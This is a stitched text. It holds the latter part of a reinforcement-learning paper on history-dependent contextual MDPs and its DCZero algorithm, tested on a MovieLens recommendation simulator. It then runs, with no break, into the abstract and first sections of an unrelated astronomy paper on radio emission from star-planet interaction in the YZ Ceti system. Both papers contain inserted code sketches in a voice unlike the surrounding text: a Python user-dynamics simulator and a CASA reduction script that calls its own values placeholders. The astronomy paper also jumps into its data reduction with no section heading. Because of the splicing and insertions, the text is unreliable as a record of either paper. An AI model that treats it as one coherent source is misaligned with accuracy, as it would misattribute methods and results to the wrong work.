(8) lies in the threshold set of \(Q\)-values (see proof in Appendix F.1). **Lemma 5.6** (Threshold Optimism).: _Let \(\mathbf{Q}\in\mathbb{R}^{M+1}\). 
For any \(\mathbf{x}\in\mathbb{R}^{M+1}\) such that \(x_{i}=0\) define \(f(\mathbf{x})=\sum_{i=1}^{M+1}z_{i}(\mathbf{x})Q_{i}\). Let \(\mathbf{CI}=[\mathbf{l},\mathbf{u}]\subseteq\mathbb{R}^{M+1}\times\mathbb{R}^{M+1}\) and assume that \(\mathbf{l}<\mathbf{u}\). Then, there exists \(t\in\mathcal{T}(\mathbf{Q})\) such that \(\mathbf{th}_{t}(\mathbf{Q},\mathbf{CI})\in\arg\max_{\mathbf{x}\in\mathbf{CI}}f(\mathbf{x})\)._ We can now leverage Lemma 5.6 to solve the inner maximization in Equation (8). For notational convenience, we write \(\bar{Q}_{i}=\bar{Q}_{i}(s,a,\mathbf{CI}_{h}^{k})\) and \(\mathbf{Q}=\left(Q_{1},\ldots,Q_{M+1}\right)^{T}\). Applying Lemma 5.6, we get that \[\max_{\bar{\mathbf{\sigma}}\in\mathbf{CI}_{h}^{k}}\sum_{i=1}^{M+1}z_{i}( \bar{\mathbf{\sigma}})\bar{Q}_{i}=\max_{t\in\mathcal{T}(\mathbf{Q})}\sum_{i=1}^{M+1}z _{i}\Big{(}\mathbf{th}_{t}\Big{(}\mathbf{Q},\mathbf{CI}_{h}^{k}\Big{)}\Big{)}\bar{Q}_{i}. \tag{9}\] As a result, the non-convex maximization problem in Equation (9) reduces the search space to \(M\) optimistic candidates. ### Putting It All Together Using Lemma 5.6 and particularly its derived corollary in Equation (9), we construct an optimistic planner, denoted by Optimistic DP, which plans via dynamic programming using Equation (9); we refer to Appendix F for an explicit formulation of the optimistic planner. Finally, using the tractable estimator \(\hat{\mathbf{f}}_{T}^{k}\), and the threshold optimistic planner, we present a tractable variant of LDC-UCB in Algorithm 2, for which we have the following regret guarantee. **Theorem 5.7**.: _Let \(\lambda=\Theta(\frac{HM^{2.5}SA}{L})\). With probability at least \(1-\delta\), the regret of Algorithm 2 is_ \[R(K)\leq\tilde{\mathcal{O}}\Big{(}\sqrt{H^{8}M^{6.5}S^{2}A^{2}L^{4}\kappa K} \Big{)}.\] The proof of the theorem can be found in Appendix D. As expected, the regret upper bound in Algorithm 2 is worse than that of Algorithm 1 by a factor of \(\tilde{\mathcal{O}}(HML)\). This result is strongly affected by the looser bound for the tractable feature maps in Lemma 5.2. Nevertheless, the intractability of Algorithm 1 compared to the tractability of Algorithm 2 suggests this is a more-than-reasonable tradeoff. Moreover, our tractable variant of LDC-UCB gives rise to practical optimistic algorithms, as we demonstrate next. ## 6 DCZero Motivated by our theoretical results, we present a practical model-based optimistic algorithm for solving DCMDPs. We build on MuZero (Schrittwieser et al., 2020), a recent model-based algorithm which constructs a model in latent space and acts using Monte Carlo Tree Search (MCTS, Coulom (2007)). MuZero uses representation, transition, and prediction networks for training and acting. The representation network first embeds observations in a latent space, after which planning takes place using the transition and prediction networks through a variant of MCTS. Importantly, instead of predicting the next state (e.g., using world models (Hafner et al., 2023)), MuZero trains its latent space by predicting three quantities--the reward, value, and current policy--by rolling out trajectories in latent space (see Schrittwieser et al. (2020) for further details). We develop DCZero, an algorithm based on MuZero for DCMDPs (see Algorithm 3). Like MuZero, DCZero uses representation, transition, and prediction networks to learn and act in the environment. In contrast to MuZero, DCZero trains an additional ensemble of networks to estimate the unknown features \(\mathbf{f}^{*}\) using cross-entropy. 
Estimated quantities of the ensemble are used to construct confidence intervals for the sufficient statistics, which are used to augment the state. DCZero uses \(M+1\) transition networks (one for each context), and predicts \(M+1\) reward functions. To incorporate optimism, the value function is trained optimistically using the thresholding technique in the previous section, where rewards for unseen actions are sampled from the trained reward models \(r_{i}\) and next states are sampled from the trained models \(P_{i}\). Movie Recommendation Environment.To evaluate the effectiveness of DCZero, we develop a movie recommendation environment based on the MovieLens dataset Harper and Konstan (2015). Users and items are represented in embedding space computed using SVD of the MovieLens ratings matrix. Each of \(n\) users is assigned a set of \(M\) possible user embeddings; i.e., each user \(u\in\left\{u^{(i)}\right\}_{i=1}^{n}\) is assigned a set of preference vectors \(\mathbf{x}=\left\{\mathbf{x}^{(j)}\right\}_{j=1}^{M+1},\mathbf{x}^{(j)}\in\mathbb{R}^{d}\). Intuitively, these vectors reflect distinct user preferences corresponding to some aspect of the user's latent state (e.g., mood or current interest Cen et al. (2020); location, companions, or activity; level of trust or satisfaction with the system) and hence influence \(u\)'s behavior. The recommendation agent interacting with a user selects an item \(x\) from a random set of \(A\) movies, \(\left\{\mathbf{v}^{(a)}\right\}_{a=1}^{A},\mathbf{v}^{(a)}\in\mathbb{R}^{d}\), and recommends it. The user context then evolves according to some history-dependent dynamics represented by a logistic DCMDP. Specifically, we assume unknown latent features \(\mathbf{f}^{*}(\mathbf{x},\mathbf{v})\) with the user's aggregated features (at time \(h\in[H]\), episode \(k\)) being: \(\mathbf{\sigma}_{k,h}=\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{f}^{*}(\mathbf{x}_{k}^{(j_{k} )},\mathbf{v}^{(a_{i})})\). The agent recommends movie \(\mathbf{v}^{(a)}\) to the user, while the user preference vector is sampled as \(\mathbf{x}_{k}^{j_{k}}\sim z(\mathbf{\sigma}_{k,h})\). The agent then receives a reward \(r_{j}(\mathbf{x},a)=(\mathbf{x}_{k}^{(j_{k})})^{T}\mathbf{\Sigma}\mathbf{v}^{(a)}\) reflecting the user's (current) preference for the movie, and the user's latent state transitions given the unknown function \(\mathbf{f}^{*}(\mathbf{x},\mathbf{v})\) and discount \(\alpha\); that is, \(\mathbf{\sigma}_{k,h+1}=\alpha\mathbf{\sigma}_{k,h}+\mathbf{f}^{*}(\mathbf{x}_{k}^{(j_{k})}, \mathbf{v}^{(a)})\). We test our methods in two variants of this environment. In the first, "AttractionEnv", user latent features \(\mathbf{f}^{*}\) are correlated with the user's degree of preference for the recommended movie: \[\mathbf{f}^{*}(\mathbf{x}^{(j)},\mathbf{v})=\mu\big{(}(\mathbf{x}^{(j)})^{T}\mathbf{\Sigma}\mathbf{v} \big{)},\] (Attraction) where \(\mu\) is a component-wise monotonically increasing function. AttractionEnv reflects users with a tendency to desire content similar to those they most recently consumed. This may reflect the positive influence of exposure to new types of content, increased familiarity increasing preference, or content domains (such as music) where some mild consistency of experience is preferred to jarring shifts in style or genre. 
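A minimal sketch of one interaction step of an AttractionEnv-style simulator is given below. The dimensions mirror the experiments (\(d=20\), \(M=6\), \(A=6\)), but taking \(\mu=\tanh\), setting \(\boldsymbol{\Sigma}\) to the identity, the random embeddings, and the per-context indexing of the feature components are all assumptions of this sketch, not the environment's actual implementation.

```python
# Toy step of AttractionEnv-style user dynamics (illustrative assumptions noted above).
import numpy as np

rng = np.random.default_rng(3)
d, M, A, alpha = 20, 6, 6, 0.99
user_prefs = rng.normal(size=(M + 1, d))            # x^(1), ..., x^(M+1): one preference vector per context
movies = rng.normal(size=(A, d))                    # current slate of A candidate movie embeddings
Sigma = np.eye(d)                                   # similarity metric (identity, an assumption)

def features(v):                                    # f(x, v): one component per context, mu taken to be tanh
    return np.tanh(user_prefs[:M] @ Sigma @ v)

def step(sigma, a):
    logits = np.append(sigma, 0.0)                  # utilities of the M contexts plus the reference context
    p = np.exp(logits - logits.max()); p /= p.sum()
    j = int(rng.choice(M + 1, p=p))                 # sampled latent user context
    reward = float(user_prefs[j] @ Sigma @ movies[a])   # r_j(x, a) = (x^(j))^T Sigma v^(a)
    sigma = alpha * sigma + features(movies[a])     # aggregated features for the next step
    return sigma, reward, j

sigma = np.zeros(M)
for h in range(5):
    sigma, r, j = step(sigma, int(rng.integers(A)))
    print(h, j, round(r, 3))
```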
The second environment, "NoveltyEnv", reflects a contrasting dynamics in which user latent features evolve such that \(\mathbf{f}^{*}\) is anti-correlated with the user's preference for the recommended movie: \[\mathbf{f}^{*}_{i}(\mathbf{x}^{(j)},\mathbf{v})=\begin{cases}-\mu\big{(}(\mathbf{x}^{(j)})^{T} \mathbf{\Sigma}\mathbf{v}\big{)}&,j=i\\ \mu\big{(}(\mathbf{x}^{(j)})^{T}\mathbf{\Sigma}\mathbf{v}\big{)}&,\text{o.w.}\end{cases}\] (Novelty) As a result, movies that previously appealed to the user become less preferred, reflecting a desire for novelty over short time periods. Experiments.All experiments used a horizon of \(H=300\), \(M=6\) user classes, \(A=6\) slate items (changing every reset), and a user embedding dimension of \(d=20\). We used default parameters for MuZero and applied the same parameters to DCZero. We compared DCZero and MuZero on the AttractionEnv and NoveltyEnv environments. We also tested a history-dependent variant of MuZero, which uses the sequence of past movies and contexts to densely represent history. More specifically, Hist-MuZero uses a stack of \(30\) previous observations as its state. We implemented both MLP and Transformer-based model architectures, but present results for the Transformer, as both had similar performance. Figure 2 shows these comparisons. The plots compare the return of DCZero with the two baselines on AttractionEnv and NoveltyEnv with \(\alpha=0.99\); we also vary the values of \(\alpha\) on the AttractionEnv. We see that DCZero is able to outperform both baselines, with significant increases in performance for larger values of \(\alpha\) (i.e., longer history dependence). This suggests that DCZero can be especially beneficial in problems that exhibit long history dependence. Interestingly, we note that using a dense history-dependent Transformer hurts performance, except for very small values of \(\alpha\) (indeed, only for \(\alpha=0.1\) does the sequence model outperform the other methods). ## 7 Related Work Our work is related to a range of research on contextual MDPs, partially observable environments, and termination-based reinforcement learning. Contextual MDPs.Contextual MDPsHallak et al. (2015) have proven useful in a numerous studies Jiang et al. (2017); Zintgraf et al. (2019); Kwon et al. (2021). Contexts are sampled once and are fixed throughout the episode. DCMDPs can be seen as a generalization of contextual MDPs, where contexts can change over time in a realistic, history-dependent fashion. Other forms of DCMDPs, are interesting directions for future work, including DCMDPs for which contexts change slowly in time. Partially Observable Environments.Partially observable MDPs are widely studied Papadimitriou and Tsitsiklis (1987); Vlassis et al. (2012); Krishnamurthy et al. (2016); Tennenholtz et al. (2020); Xiong et al. (2022). As POMDPs are inherently history dependent, recent work has identified models and assumptions for which sample-efficient algorithms can be derived Xiong et al. (2022); Liu et al. (2022); b). Nevertheless, such solutions are often computationally intractable, impeding their practical implementation. With DCMDPs, we focus on specific forms of history-dependence, and show them to be computationally tractable, as well as effectively deployable. Termination-based RL.Tennenholtz et al. (2022) define TerMDPs, a framework which models exogenous, non-Markovian termination in the environment. Once terminated, the agent stops acting and accrues no further rewards. 
TerMDPs capture various scenarios in which exogenous actors disengage with the agent (e.g., passengers in autonomous vehicles or users abandoning a recommender), and can be shown to be a special case of logistic DCMDPs (see Appendix B.2). As such, logistic DCMDPs support reasoning about optimizing more general contextual behavior, including: those involving notions of trust (e.g., where users become more or less receptive to agent recommendations); situations where humans override an agent for short periods; and modeling the effects of user satisfaction, moods, etc. ## 8 Discussion and Future Work In this work we presented DCMDPs, and logistic DCMDPs in particular--a general history-dependent contextual framework which admits sample and computationally efficient solutions. The aggregation structure of logistic DCMDPs gives rise to efficient estimation of the unknown feature maps. We provided regret guarantees and developed a tractable realization of LDC-UCB using a computational estimator and a novel planning procedure. Finally, we tested DCZero, a model-based implementation of LDC-UCB, demonstrating its efficacy on a recommendation benchmark. While logistic DCMDPs assume linear aggregations of past features, other variants with more complex parametric function classes over history are possible. Nevertheless, such complex function classes often require sample-inefficient techniques, suggesting that logistic DCMDPs may be especially well-suited to capturing extended, long history dependence. In particular, they admit sample and computationally efficient solutions, which can be implemented in practice. As future work, a hybrid approach which considers combining dense models (such as Transformers) for short-history dependence, and aggregated models (such as logistic DCMDPs) for very long history dependence, may offer the "best of both worlds" in practice. We leave this as an interesting direction for future work. Finally, this paper did not discuss solutions for partially observable contexts in logistic DCMDPs (where contexts are history dependent, yet unobserved). Such a setting requires additional assumptions, that are out-of-scope in this work. Nevertheless, our results can be used as building blocks for solving such latent logistic DCMDPs. Figure 2: Plots comparing MuZero, Hist-Muzero, and DCZero on the AttractionEnv(left) and NoveltyEnv (middle). We also compare results for different values of \(\alpha\) (right). All experiments show mean scores with 95% confidence intervals. ## Acknowledgements This project has received funding from the European Union's Horizon 2020 research and innovation programme under the Marie Sklodowska-Curie grant agreement No 101034255. Nadav Merlis is partially supported by the Viterbi Fellowship, Technion.
2305.00809
Star-Planet Interaction at radio wavelengths in YZ Ceti: Inferring planetary magnetic field
In exoplanetary systems, the interaction between the central star and the planet can trigger Auroral Radio Emission (ARE), due to the Electron Cyclotron Maser mechanism. The high brightness temperature of this emission makes it visible at large distances, opening new opportunities to study exoplanets and to search for favourable conditions for the development of extra-terrestrial life, as magnetic fields act as a shield that protects life against external particles and influences the evolution of the planetary atmospheres. In the last few years, we started an observational campaign to observe a sample of nearby M-type stars known to host exoplanets with the aim to detect ARE. We observed YZ Ceti with the upgraded Giant Metrewave Radio Telescope (uGMRT) in band 4 (550-900 MHz) nine times over a period of five months. We detected radio emission four times, two of which with a high degree of circular polarization. With statistical considerations we exclude the possibility of flares due to stellar magnetic activity. Instead, when folding the detections to the orbital phase of the closest planet YZ Cet b, they are at positions where we would expect ARE due to star-planet interaction (SPI) in the sub-Alfvenic regime. With a degree of confidence higher than 4.37 sigma, YZ Cet is the first extrasolar system with confirmed SPI at radio wavelengths. Modelling the ARE, we estimate a magnetic field for the star of about 2.4 kG and we find that the planet must have a magnetosphere. The lower limit for the polar magnetic field of the planet is 0.4 G.
Corrado Trigilio, Ayan Biswas, Paolo Leto, Grazia Umana, Innocenza Busa, Francesco Cavallaro, Barnali Das, Poonam Chandra, Miguel Perez-Torres, Gregg A. Wade, Cristobal Bordiu, Carla S. Buemi, Filomena Bufano, Adriano Ingallinera, Sara Loru, Simone Riggi
2023-05-01T13:16:05Z
http://arxiv.org/abs/2305.00809v1
# Star-Planet Interaction at radio wavelengths in YZ Ceti: Inferring planetary magnetic field

###### Abstract

In exoplanetary systems, the interaction between the central star and the planet can trigger Auroral Radio Emission (ARE), due to the Electron Cyclotron Maser mechanism. The high brightness temperature of this emission makes it visible at large distances, opening new opportunities to study exoplanets and to search for favourable conditions for the development of extra-terrestrial life, as magnetic fields act as a shield that protects life against external particles and influences the evolution of the planetary atmospheres. In the last few years, we started an observational campaign to observe a sample of nearby M-type stars known to host exoplanets with the aim to detect ARE. We observed YZ Ceti with the upgraded Giant Metrewave Radio Telescope (uGMRT) in band 4 (550--900 MHz) nine times over a period of five months. We detected radio emission four times, two of which with a high degree of circular polarization. With statistical considerations we exclude the possibility of flares due to stellar magnetic activity. Instead, when folding the detections to the orbital phase of the closest planet YZ Ceti b, they are at positions where we would expect ARE due to star-planet interaction (SPI) in the sub-Alfvenic regime. With a degree of confidence higher than \(4.37\,\sigma\), YZ Cet is the first extrasolar system with confirmed SPI at radio wavelengths. Modelling the ARE, we estimate a magnetic field for the star of about \(2.4\,\mathrm{kG}\) and we find that the planet must have a magnetosphere. The lower limit for the polar magnetic field of the planet is \(0.4\,\mathrm{G}\).

Star-planet interactions -- Astrophysical masers -- Radio interferometry -- M dwarf stars -- Stellar magnetic fields

## 1 Introduction

The presence of magnetospheres surrounding terrestrial planets is believed to play an important role in the evolution of the planetary atmospheres and in the development of life (Griessmeier et al., 2005, 2016; Owen & Adams, 2014; McIntyre et al., 2019; Green et al., 2021). Magnetic fields act as a shield that prevents the arrival of ionized and potentially dangerous particles at the planetary surface (Shields et al., 2016; Garcia-Sage et al., 2017). This happened to the Earth, which has a magnetic field, and, among the planets in the habitable zone of the solar system, is the only one where life is known to have emerged. On the other hand, intense solar flares and coronal mass ejections (CME) may compress the planet's magnetosphere, causing the opening of the polar caps and providing a free way for energetic particles to precipitate into the atmosphere (Airapetian et al., 2015, 2017), producing fixation of molecules such as nitrogen and carbon dioxide and, possibly, ingredients for the development of life. This may have happened in the atmosphere of the young Earth (Airapetian et al., 2016). In this context, both planetary magnetospheres and stellar activity, with increasing ionizing radiation (UV, X-rays) (Lammer et al., 2012; Vidotto, 2022), play important roles in creating a favourable environment for the development of life. In addition, the presence of a magnetic field in planets gives the opportunity to infer important characteristics of their interiors, as an indicator of an internal dynamo (Lazio et al., 2019).
The analysis of observations at radio wavelengths, which are sensitive to flares, associated energy releases and particles acceleration, is important to probe the interplanetary space in planetary systems other than the solar system. So far, many planets have been found around red and ultracool dwarfs, which constitute the most common stars in our Galaxy and are the majority of nearby stars. They possess long-lived, suitable conditions for the development of life in their planetary systems. Earth-sized planets, some of them in the habitability zone, have been detected orbiting cool stars, as for example in the case of Trappist-1 (Gillon et al., 2016, 2017), Proxima Cen (Anglada-Escude et al., 2016) and Teegarden's Star (Zechmeister et al., 2019). Aurorae are important manifestations of Star-Planet Interaction (SPI) in all the magnetized planets of the Solar System, detected as line emission in optical, UV and X-rays. These emissions are due to the precipitation of energetic charged particles of the solar wind in the planet's atmosphere around the polar magnetic caps. Moreover, the magnetic interaction with satellites in close orbit, as in the case of Jupiter and its Galilean moons, triggers particle acceleration that causes aurorae in the polar caps of the giant planet. At radio wavelengths, highly beamed, strongly polarized bursts are visible. They appear to originate from an annular region above the magnetic poles, associated to auroras in the atmosphere of Jupiter (e.g. Zarka, 1998). This is interpreted in terms of Electron Cyclotron Maser Emission (ECME) that originates in the magnetospheric auroral cavities, and is called Auroral Radio Emission (ARE). ## 2 Auroral Radio Emission The ECME is a coherent emission mechanism due to the gyro-resonance of an asymmetric population of electrons in velocity space. This can occur when electrons converging toward a central body, following the magnetic flux tubes, are reflected back by magnetic mirroring. Since electrons with small pitch angles penetrate deeper, they precipitate in the atmosphere of the central body, causing ultraviolet and optical auroras. This leads to a loss-cone anisotropy in the reflected electronic population, i.e. an inversion of population in velocity space, giving rise to maser emission. This amplifies the extraordinary magneto-ionic mode, producing almost 100% circularly polarized radiation at frequencies close to the first few harmonics of the local gyro-frequency (\(\nu_{\rm B}=2.8B\) MHz, with \(B\) in G). Locally, the amplified radiation is beamed in a thin _hollow cone_, whose axis in tangent to the local magnetic field line (_hollow cone model_) (Melrose and Dulk, 1982). ARE is also observed in single stars, as hot magnetic chemically peculiar stars (mCP) (e.g. Trigilio et al., 2000; Das et al., 2022; Leto et al., 2020), and in many very low mass stars and Ultra Cool Dwarfs (UCDs), with spectral type ranging from M8 to T6.5 (e.g. Berger et al., 2009; Hallinan et al., 2007; Route and Wolszczan, 2012; Lynch et al., 2015). Notwithstanding that they are located in very different regions of the Hertzsprung-Russell (HR) diagram, these stars have a common characteristic: a strong magnetic field, dominated by the dipole component, tilted with respect to the star's rotational axis. In mCP stars, where the magnetic topology is known, we observe two pulses at two rotational phases, close to the moments where the axis of the dipole lies in the plane of the sky. 
As the star rotates, the ECME produces a light-house effect, similar to pulsars. The same behaviour is observed in a few UCDs (Hallinan et al., 2007). In Solar system planets, the location of the origin of ECME, as in the case of the auroral kilometric radiation (AKR) of the Earth (Mutel et al., 2008), is the same as that derived from observations of stars, i.e. at a height of about \(0.1-2\) stellar radii above the poles, tangent to annular rings of constant B. This is in agreement with the _tangent plane beaming model_(Trigilio et al., 2011). This pattern of emission can occur when it originates in all points of the annular ring, each of them with a hollow cone pattern, and the overall emission is the sum of the emission from each ring; in the tangential direction the radiation is intensified. On the contrary, the _hollow cone model_ seems more adequate when the maser acts only in a small portion of the annular ring, corresponding to the flux tube connecting the planet, and the emission pattern is the natural hollow-cone. This pattern explains the ARE in most Solar system planets and is invoked to explain the radio emission arising from exo-planets. However, for both models, ARE is foreseen to appear in symmetric orbital position of the planet with respect to the line of sight. There are two kinds of ARE due to the interaction between our Sun and planets, which are believed to also act in exoplanetary systems. The first is due to the ram pressure of the wind of the star on the magnetosphere of the planet. In this case the frequency of the ECME is proportional to the magnetic field strength of the planet (\(B_{\rm planet}\)) for which any detection of ARE provides a direct measurement. However, since \(B_{\rm planet}\) is expected to be of the order of a few gauss, the frequency of the maser is expected to fall at the edge, or below, the ionospheric boundary of the radio window. In fact, the search for this emission gives basically negative results (e.g. Bastian et al., 2000; Ryabov et al., 2004; Hallinan et al., 2007; Lecavelier des Etangs et al., 2013; Sirothia et al., 2014). The second kind is due to the interaction of the orbiting planet with the magnetosphere of the parent star. This case is analogous to the system of Jupiter and its moons. At the present, there are some possible detections of this kind of ARE. The observed features in the time-frequency domain of the stellar ARE from the M8.5-type star TVLM 513-46546 (Hallinan et al., 2007; Lynch et al., 2015) were explained as a signature of an external body orbiting around this UCD. This possibility is supported by a model developed by Leto et al. (2017). Vedantham et al. (2020) claimed the detection of ARE from GJ 1151, an M4.5V star at 8.04 pc, by comparing two observations made during the LOFAR Two-Metre Sky Survey (LoTSS, Tasse et al., 2021). They detected Stokes V on one epoch, suggesting a possible SPI between the star and a hypothetical planet in close orbit. Indeed, Mahadevan et al. (2021) report the possibility of a planet of 2-day orbit, but Perger et al. (2021) ruled out this hypothesis with accurate radial velocity measurements. Similarly, Davis et al. (2021) report possible ARE in the dMe6 star WX UMa by comparing three observations of the LoTSS survey. However, none of these observations demonstrate that this ECME is due to SPI, since no planets have been found around these stars. 
The only successful way to associate ECME with SPI is to observe stars with confirmed planets for which orbital parameters are known, looking for a correlation of any detected ECME with the orbital phase or with periodicity in the radio emission different form the rotation rate of the star. This has been attempted by Trigilio et al. (2018) who observed \(\alpha\) Cen B with the aim to detect ARE from \(\alpha\) Cen Bb, (Dumusque et al., 2012). However, no detection has been reported; moreover, in this case the presence of a planet was ruled out (Rajpaul et al., 2016). The most evident case of ARE from SPI is that of the Proxima Cen - Proxima Cen b system, which was observed by Perez-Torres et al. (2021) in the 1-3 GHz band with the Australia Telescope Compact Array (ATCA) in 2017 for 17 consecutive days (spanning \(\sim\)1.6 orbital periods). They detected circularly polarized radio emission at 1.6 GHz at most epochs, a frequency consistent with the expected electron-cyclotron frequency for the known star's magnetic field intensity of \(\sim\)600 gauss (Reiners and Basri, 2008). Based on the 1.6 GHz ATCA light curve behavior, which showed an strongly circularly polarized emission pattern that correlated with the orbital period of the planet Proxima b, Perez-Torres et al. (2021) found evidence for auroral radio emission arising from the interaction between the planet Proxima b and its host star Proxima. With the aim to search for additional robust detections of ARE due to SPI, we started an observational campaign with several radio interferometers. The targets are nearby exoplanetary systems around late-type stars with planets in close orbit. In this Letter, we report the results of one of these campaigns, carried out with the uGMRT, which resulted in the detection of highly-polarized radio emission from YZ Ceti, which is consistent with ARE due to SPI between the planet YZ Ceti b and its host star. ## 3 YZ Ceti YZ Cet (GJ 54.1, 2MASS J01123052-1659570) is an M4.5V type star with a mass \(M_{*}=0.14\,M_{\odot}\) and a radius \(R_{*}=0.157\,R_{\odot}\)(Stock et al., 2020), at a distance of 3.71 pc (Gaia Collaboration et al., 2018), hosting an ultra-compact planetary system. At the present time, three Earth-mass planets have been discovered with the radial velocity (RV) method (Astudillo-Defru et al., 2017), namely YZ Cet b, c, d with orbital periods \(P_{\rm orb}=2.02,3.06,4.66\) days and semi-major axes \(r_{\rm orb}=0.016,0.022,0.028\) au, respectively (Stock et al., 2020), corresponding to \(21.9,30.1,38.3\,R_{*}\). No planetary transits have been observed for the YZ Cet system. For this reason the radii of the planets are not measured, but there is an estimate of \(R_{\rm b}=0.93\), \(R_{\rm c}=1.05\) and \(R_{\rm d}=1.04\,R_{\oplus}\) from a semi-empirical mass-radius relationship (Stock et al., 2020). YZ Cet is a mid-M type star classified as an eruptive variable. Stars of this spectral type tend to have strong, kG, axisymmetric dipolar field topologies (Kochukhov and Lavail, 2017, and references therein). YZ Cet is a slow rotator, with a period \(P_{\rm rot}=68\) days (Stock et al., 2020) and an age of 3.8 Gyr (Engle and Guinan, 2017) and from the activity indicator, based of the H&K CaII UV lines, \(\log R^{{}^{\prime}}_{\rm HK}=-4.87\) we deduce that it has a low activity level (Henry et al., 1996). 
The coronal X-ray luminosity determined from two ROSAT measurements is Lx\(\approx 10^{27.1}\) erg s\({}^{-1}\), similar to the solar value (Lx\({}_{\odot}\approx 10^{26.8}-10^{27.3}\) erg s\({}^{-1}\), Judge et al., 2003). From the Güdel-Benz relation (Güdel and Benz, 1993), coupling X-ray and spectral radio luminosities in stars (Lx\(\approx\)Lr\({}_{\nu}\times 10^{15.5}\)), we can estimate the basal radio luminosity of YZ Cet (Lr\(\approx 10^{11.6}\) erg s\({}^{-1}\)Hz\({}^{-1}\)) and, assuming a distance of 3.71 pc, a basal radio flux density of \(S_{\nu}\approx 25\,\mu\)Jy. YZ Cet was observed several times at radio wavelengths, from 843 to 4880 MHz (Wendker, 1995; McLean et al., 2012), but never detected. Vidotto et al. (2019) assert that YZ Cet b could give detectable ARE, due to the interaction of the stellar wind with the planet's magnetosphere, but at MHz frequencies. Very recently1, Pineda & Villadsen (2023) observed YZ Cet with the VLA at 2-4 GHz on five days, from Nov 2019 to Feb 2020. They detected two coherent bursts with a high degree of circular polarization, modeling their results as due to ARE from SPI, but not excluding the possibility of flares due to stellar magnetic activity. Footnote 1: after this paper was initially submitted.

Data reduction was carried out with CASA-based scripts that use the task 'flagdata' and the automatic flagging algorithm 'tfcrop' to remove radio frequency interference (RFI). The central baselines were treated with extra precaution to improve data quality. The calibration process was done in several iterations with conservative flagging to reduce the amount of flagged data. In the first step, the calibration solutions were applied to the flux calibrator only, and the calibrated data were flagged using another automatic RFI excision algorithm, 'rflag'. Although initially a wider band of data was taken for analysis, depending on data quality, after the first iteration only a fixed final bandwidth of 265 MHz was used. In consecutive iterations, new calibration solutions were applied to the phase calibrators and the target, respectively. At each step, the minimum signal-to-noise ratio for the calibration steps and the flagging parameters were changed. This method improved the calibration, while keeping the flagging percentage as low as possible. Averaging in frequency on the final data was performed to obtain a final spectral resolution of 0.78 MHz. All the imaging was done using the CASA task 'tclean', with the deconvolver 'mtmfs' (Multiscale Multi-frequency with W-projection, Rau and Cornwell, 2011). Several rounds of phase self-calibration were performed to improve the imaging results using the 'gaincal' and 'tclean' tasks. To remove the strong imaging artefacts created by bright sources near the phase centre, some of the nearby bright sources were removed from the visibility plane. This was done by subtracting the model visibilities of those bright nearby sources using the task 'uvsub'. Finally, several rounds of phase-only and two rounds of amplitude-and-phase (A & P) self-calibration were performed to get the final radio image. Analysis of the maps has been carried out using the task 'imfit' to measure the integrated flux density of the source, assuming a two-dimensional Gaussian, and 'imstat' for the evaluation of the RMS of the maps near the target. Stokes I data were analysed for all the days of observation, whereas Stokes V data were analysed only in the case of detection. Results of the analysis are provided in Table 2.
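To make the reduction sequence above concrete, the following is a schematic sketch of the kind of CASA (casatasks) calls described in this section. The measurement-set and image names, box coordinates, and parameter values are illustrative placeholders of ours, not the actual scripts used for this work.

```python
# Illustrative CASA 6 (casatasks) sketch of the reduction steps described above.
# File names and numerical parameters are placeholders, not the actual values used.
from casatasks import flagdata, gaincal, applycal, tclean, uvsub, imfit, imstat

vis = 'yzcet_band4.ms'  # hypothetical uGMRT band-4 measurement set

# Automatic RFI excision: 'tfcrop' on raw data, 'rflag' on calibrated data.
flagdata(vis=vis, mode='tfcrop', datacolumn='data', action='apply')
flagdata(vis=vis, mode='rflag', datacolumn='corrected', action='apply')

# Initial imaging with the 'mtmfs' deconvolver and W-projection gridding.
tclean(vis=vis, imagename='yzcet_iter0', deconvolver='mtmfs', nterms=2,
       gridder='wproject', wprojplanes=-1, imsize=4000, cell='0.5arcsec',
       weighting='briggs', robust=0.5, niter=3000, stokes='I')

# Phase-only self-calibration rounds, followed by amplitude-and-phase rounds.
for i, calmode in enumerate(['p', 'p', 'p', 'ap', 'ap']):
    caltable = f'selfcal_{i}.tb'
    gaincal(vis=vis, caltable=caltable, calmode=calmode, solint='2min')
    applycal(vis=vis, gaintable=[caltable])
    tclean(vis=vis, imagename=f'yzcet_iter{i+1}', deconvolver='mtmfs',
           nterms=2, gridder='wproject', wprojplanes=-1, imsize=4000,
           cell='0.5arcsec', weighting='briggs', robust=0.5, niter=3000)

# Subtract the model visibilities of bright confusing sources from the data.
uvsub(vis=vis)

# Target flux density (2D Gaussian fit) and local map RMS.
fit = imfit(imagename='yzcet_iter5.image.tt0', box='1970,1970,2030,2030')
rms = imstat(imagename='yzcet_iter5.image.tt0', box='1800,1800,1950,1950')['rms'][0]
```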
## 5 Results

YZ Cet has been detected on four days out of nine, namely days 3, 4, 5 and 6 (Table 1). Stokes I is between 290 and 1070 \(\mu\)Jy, more than 5\(\sigma\) even for the lowest emission, which occurs on day 4. Stokes V is reported only on days 5 and 6, with positive values on both days2, and with a very high percentage of circular polarization, 93% and 75% respectively. The highly circularly polarized radio emission on days 5 and 6 is consistent with ECME. Footnote 2: The uGMRT sign convention in band 4 for defining right and left circular polarization is opposite to the IAU/IEEE convention (Das et al., 2020). We have taken this fact into account in our post-processing of the uGMRT data so that the convention used in this work is the same as the IAU/IEEE convention for circular polarization.

In order to investigate the presence of SPI, the Stokes I flux densities have been folded with the orbital periods of the three known planets. We used the ephemeris provided by Stock et al. (2020), which for planet b are \(HJD=2452996.25\) and \(P_{\rm orb}=2.02087\) days. While for planets c and d detections and non-detections are randomly mixed around the orbits, for planet b the phases corresponding to detections appear in two groups, approximately between phases 0.07-0.2 and 0.78-0.9. The two intervals are marked as light blue areas in Fig. 1, and the corresponding orbital positions are shown in Fig. 2.

A deeper analysis has been carried out in Stokes V for the two days of detection. We computed a spectrogram of the emission by performing the Discrete Fourier Transform (DFT) of the complex visibilities at the position of the star as a function of time and frequency channels. This analysis was carried out only for Stokes V since there are no other sources in the field, while in Stokes I this analysis suffers from the presence of sidelobes of other sources at the position of the target. The dynamical spectra do not show any notable structures. We then obtained light curves by averaging first over the whole bandwidth and then with a time resolution of 4 minutes. These are shown in Fig. 3, where time is converted into orbital phase. During day 6 the temporal behaviour of Stokes V is a little noisier with respect to that of day 5, and does not show any particular trend. During day 5 it is possible to appreciate a decrease of emission at the middle of the observation, demonstrating that the emission is likely not constant even on short timescales (\(\lessapprox 1\) hour). We also obtained in-band spectra for days 5 and 6 by averaging first over the whole time range and then with a resolution of 33 MHz. In-band spectra are shown in 